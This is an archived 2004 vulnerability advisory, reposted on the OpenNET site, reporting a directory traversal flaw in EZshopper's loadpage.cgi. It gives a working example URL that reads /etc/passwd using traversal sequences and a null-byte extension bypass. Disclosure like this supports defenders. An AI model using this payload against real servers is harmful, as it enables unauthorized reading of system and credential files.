The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


EZshopper is still vulnerable against Directory Traversal.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 25 Nov 2004 15:33:22 -0000
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org.>
To: [email protected]
Subject: EZshopper is still vulnerable against Directory Traversal.



Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X@excluded.org.>


loadpage.cgi of EZshopper allows Directory Traversal


Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

- http://www.excluded.org


- Zero X
- http://www.excluded.org

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру